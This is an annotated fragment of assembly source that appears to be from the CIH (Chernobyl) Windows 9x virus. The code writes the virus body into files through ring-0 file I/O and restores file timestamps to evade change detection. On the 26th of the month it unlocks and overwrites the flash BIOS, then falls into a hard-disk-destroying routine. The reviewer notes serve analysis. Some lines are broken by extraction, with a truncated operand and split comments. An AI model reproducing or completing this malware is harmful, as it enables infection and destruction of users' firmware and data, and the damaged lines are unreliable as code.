; Walk the table of VxD call sites from the last entry backwards and rewrite
; each site to the two bytes CD 20 (int 20h) followed by the 32-bit ID taken
; from VxDCallIDTable.
; NOTE(review): on Windows 9x the VMM rewrites `int 20h` + ID sites in place on
; first use, so this presumably puts the unresolved form back before the body
; is written out below -- confirm against the code that precedes this view.
lea eax, (LastVxDCallAddress-2-@9)[esi] ; eax -> last call site (esi-relative; @9 is a base label outside this view)
mov cl, VxDCallTableSize ; loop count; only cl is written, so the rest of ecx is assumed to be 0 already
LoopOfRestoreVxDCallID:
mov word ptr [eax], 20cdh ; stores bytes CD 20 = int 20h
mov edx, (VxDCallIDTable+(ecx-1)*04h-@9)[esi] ; edx = ID dword for table entry ecx-1
mov [eax+2], edx ; the ID goes directly after the int 20h
; NOTE(review): the next line is cut off on this page (it ends at "[es"); left as found.
movzx edx, byte ptr (VxDCallAddressTable+ecx-1-@9)[es
sub eax, edx ; step back by the byte distance read from VxDCallAddressTable
loop LoopOfRestoreVxDCallID ; ecx -= 1, repeat until 0
; Load the values used by the write loop from the structure whose address is
; kept in debug register DR1.
; NOTE(review): `mov eax, dr1` is a privileged instruction, so this code runs
; at ring 0. DR1 is used here as storage rather than as a breakpoint address,
; which is unusual enough to serve as an indicator during analysis.
WriteVirusCodeToFile:
mov eax, dr1 ; eax = pointer stashed in DR1 (set outside this view)
mov ebx, [eax+10h] ; NOTE(review): presumably the file handle for the calls below -- confirm
mov edi, [eax] ; edi = entry point called below (annotated there as IFSMgr_Ring0_FileIO)
; Consume a list of three-dword records from the stack and issue one file-I/O
; call (eax = 0D601h) per record; a zero first dword ends the list.
; The records were pushed by code outside this view.
; NOTE(review): from the register use, each record is presumably
; (buffer -> esi, file offset -> edx, byte count -> ecx) and 0D601h the
; write function code -- confirm against the IFSMgr documentation.
LoopOfWriteVirusCodeToFile:
pop ecx ; first dword of the record, or the 0 terminator
jecxz SetFileModificationMark ; 0 => every record has been written
mov esi, ecx ; first dword becomes the esi argument
mov eax, 0d601h ; function code for the call
pop edx ; second dword of the record
pop ecx ; third dword of the record
call edi ; VXDCall IFSMgr_Ring0_FileIO
jmp LoopOfWriteVirusCodeToFile ; next record; the call's result is not checked here
; Reached when the write list is exhausted. Drops two saved dwords and pushes a
; flags image with CF = 1; CloseFile pops that image after its call and uses CF
; to choose between the timestamp-restore path and the date check.
SetFileModificationMark:
pop ebx ; NOTE(review): pushed outside this view; meaning not confirmed
pop eax ; NOTE(review): pushed outside this view; meaning not confirmed
stc ; CF = 1
pushf ; keep the flags (CF = 1) across the close call
; Issue file-I/O function 0D700h, then branch on the saved carry flag:
; CF = 0 goes to the date check at IsKillComputer, CF = 1 continues with
; function 4303h using the two words stored at FileModificationTime.
; Execution then falls through into DisableOnBusy.
; NOTE(review): 0D700h is presumably "close file" and 4303h presumably "set
; modification date/time" -- confirm. If so, the file keeps its earlier
; timestamp after being modified, so timestamp-based change detection will not
; flag it; a content hash still will.
CloseFile:
xor eax, eax
mov ah, 0d7h ; eax = 0000D700h
call edi ; VXDCall IFSMgr_Ring0_FileIO
popf ; recover the flags image pushed before the call
pop esi ; esi = base for the (X-@7)[esi] references below
jnc IsKillComputer ; CF = 0: skip the timestamp call
mov ebx, edi ; edi is reused as an argument below, so keep the entry point in ebx
mov ax, 4303h ; only ax is written; the upper half of eax is whatever the previous call left
mov ecx, (FileModificationTime-@7)[esi] ; first saved value
mov edi, (FileModificationTime+2-@7)[esi] ; value stored 2 bytes further on
call ebx ; VXDCall IFSMgr_Ring0_FileIO
; Common exit: decrement the OnBusy byte, restore two saved register sets and
; return. The two matching pushad instructions are outside this view.
; NOTE(review): OnBusy looks like a re-entrancy guard for this routine, going
; by its name -- confirm where it is incremented.
DisableOnBusy:
dec byte ptr (OnBusy-@7)[esi] ; OnBusy -= 1
prevhook:
popad ; restore the inner saved register set
popad ; restore the outer saved register set
ret
; Date-triggered payload gate followed by the firmware-write sequence.
; Reads CMOS register 07h through ports 70h/71h and continues only when the
; value equals 26h; any other value leaves through DisableOnBusy. A build with
; DEBUG set always leaves through DisableOnBusy, so the code after ENDIF never
; runs in such a build.
; The remainder disables interrupts, calls two helpers that are outside this
; view (IOForEEPROM, EnableEEPROMToWrite) and writes single bytes to addresses
; in the E0000h-FFFFFh range, then falls through into KillHardDisk.
; NOTE(review): this path depends on ring-0 port I/O and on the flash part
; accepting writes; on boards where flash write protection is enforced in
; hardware the byte writes below would presumably have no effect -- confirm.
IsKillComputer:
; Get Now Day from BIOS CMOS
mov al, 07h ; CMOS index 07h
out 70h, al ; select the register
in al, 71h ; read its value
xor al, 26h ; ??/26/????  (ZF = 1 only when the value read is 26h)
IF DEBUG
jmp DisableOnBusy
ELSE
jnz DisableOnBusy
ENDIF
mov bp, 0cf8h ; NOTE(review): 0CF8h is the PCI configuration address port -- use is inside the helper, confirm
lea esi, IOForEEPROM-@7[esi] ; esi = helper entry point (outside this view)
mov edi, 8000384ch ; NOTE(review): presumably a PCI configuration address for the helper -- confirm
mov dx, 0cfeh ; NOTE(review): lies in the PCI configuration data port range 0CFCh-0CFFh
cli ; interrupts off; no matching sti in the visible code
call esi
mov di, 0058h ; replaces only the low word of edi (-> 80000058h)
; NOTE(review): the trailing comment on the next line was split by the page
; extraction; the bare "0fh" line is the rest of that comment, not an operand.
; The word 0F24h stored below is the byte pair 24 0F, the encoding of
; `and al, 0fh`, so the comment presumably read "and al, 0fh".
dec edx ; and a
0fh
mov word ptr (BooleanCalculateCode-@10)[esi], 0f24h ; self-modifying: patches two bytes inside the helper
call esi ; run the helper again with the patched operation
lea ebx, EnableEEPROMToWrite-@10[esi] ; ebx = second helper (outside this view)
; NOTE(review): the address/value pairs below look like flash-chip command
; cycles; what each one does depends on EnableEEPROMToWrite -- confirm.
mov eax, 0e5555h
mov ecx, 0e2aaah
call ebx
mov byte ptr [eax], 60h ; byte write to the address left in eax
push ecx ; keep ecx for the second sequence
loop $ ; busy-wait: spins until ecx reaches 0
xor ah, ah
mov [eax], al
xchg ecx, eax ; previous eax becomes the next delay count
loop $ ; busy-wait
mov eax, 0f5555h
pop ecx ; value saved before the first delay
mov ch, 0aah
call ebx
mov byte ptr [eax], 20h
loop $ ; busy-wait
mov ah, 0e0h
mov [eax], al
; NOTE(review): same extraction damage as above. The word 100Ch stored below is
; the byte pair 0C 10, the encoding of `or al, 10h`, so the split comment
; presumably read "or al, 10h".
; or al
0h
mov word ptr (BooleanCalculateCode-@10)[esi], 100ch ; self-modifying: patches the helper's operation again
call esi
KillHardDisk:
xor ebx, ebx
mov bh, FirstKillHardDisk